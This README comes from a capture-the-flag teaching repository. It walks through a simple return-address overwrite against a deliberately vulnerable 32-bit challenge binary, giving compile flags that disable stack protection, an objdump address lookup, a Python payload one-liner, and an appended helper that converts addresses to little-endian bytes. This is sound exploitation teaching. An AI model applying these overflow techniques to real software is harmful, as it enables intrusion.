omnifocal/exploitation

Materials, notes, and talks about binary exploitation & RE
Jack the ROPper (Jack - @omnifocal1)

Very simple ROP

  • The binary contains a function that is never called and that prints the flag
  • Reverse the binary and find:
    • An input routine with missing bounds checking
    • The address of a function that performs the desired action (printing the flag)
  • Overflow the buffer so the saved return address is overwritten with the address of the flag-printing function
  • Win!

How to compile

  • On kali-rolling
  • apt install libc6-dev-i386
  • gcc -m32 -fno-stack-protector -fno-PIC -no-pie -o jtr jtr.c
    • The flags disable the stack canary and PIE, so the overflow is not detected and the win function sits at a fixed address

How to win

  • Read the SecTalks slides: jtr.key
  • Read the challenge walkthrough:
    • Detailed: jtr_walkthrough.md
    • Short: jtr_walkthrough_short.md
  • Note that if using radare2 you should install from git:
  • Or do it the quick way:
    • Find the starting address of the win function
      • objdump -t jtr | grep win
    • Copy the address from the first column and reverse its byte order (x86 is little-endian), e.g.:
      • 0804849b g F .text 00000019 win
      • Becomes: 9b840408
    • Build a command line that overflows the buffer and blasts the win address all over the stack :P
      • python -c 'print("\x9b\x84\x04\x08" * 100)'
      • This relies on Python 2, where print writes the string as raw bytes; Python 3 would UTF-8 encode it
    • Run it!:
      • python -c 'print("\x9b\x84\x04\x08" * 100)' | ./jtr
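An added example (mine, not part of this repo) that automates the two lookup steps above: it parses `objdump -t` output and produces the little-endian byte string, and it also handles 16-digit (x86-64) addresses. The objdump text is a constructed sample built around the `win` line quoted above; the other lines are filler.

```python
import struct

# Constructed sample of `objdump -t` output, modelled on the symbol-table line
# quoted in this README (the `win` line); the other lines are made-up filler.
SAMPLE_OBJDUMP = """\
08048420 l    d  .text\t00000000              .text
0804849b g     F .text\t00000019              win
080484b4 g     F .text\t0000004a              main
"""


def parse_symbols(objdump_text):
    """Parse `objdump -t` lines into {name: (address, address_width_in_bytes)}.

    Each symbol line is: address, flag characters, section, size, name.
    Splitting on whitespace and taking the first and last fields avoids
    depending on the exact layout of the flags column.  The number of hex
    digits in the address column tells us whether the binary is 32- or
    64-bit (8 digits -> 4 bytes, 16 digits -> 8 bytes).
    """
    symbols = {}
    for line in objdump_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue  # "file format" header, "SYMBOL TABLE:", blank lines
        addr_hex, name = fields[0], fields[-1]
        try:
            address = int(addr_hex, 16)
        except ValueError:
            continue  # not a symbol line
        width = 4 if len(addr_hex) <= 8 else 8
        symbols[name] = (address, width)
    return symbols


def little_endian(address, width):
    """Return the address as x86 (little-endian) bytes: 0x0804849b -> 9b 84 04 08.

    This is the README's 'reverse byte order' step done with struct instead
    of by hand; the same call works for 8-byte (x86-64) addresses.
    """
    return struct.pack("<I" if width == 4 else "<Q", address)


def symbol_bytes(objdump_text, name):
    """Little-endian byte string of the named symbol's address."""
    address, width = parse_symbols(objdump_text)[name]
    return little_endian(address, width)


if __name__ == "__main__":
    print(symbol_bytes(SAMPLE_OBJDUMP, "win").hex())  # prints 9b840408
```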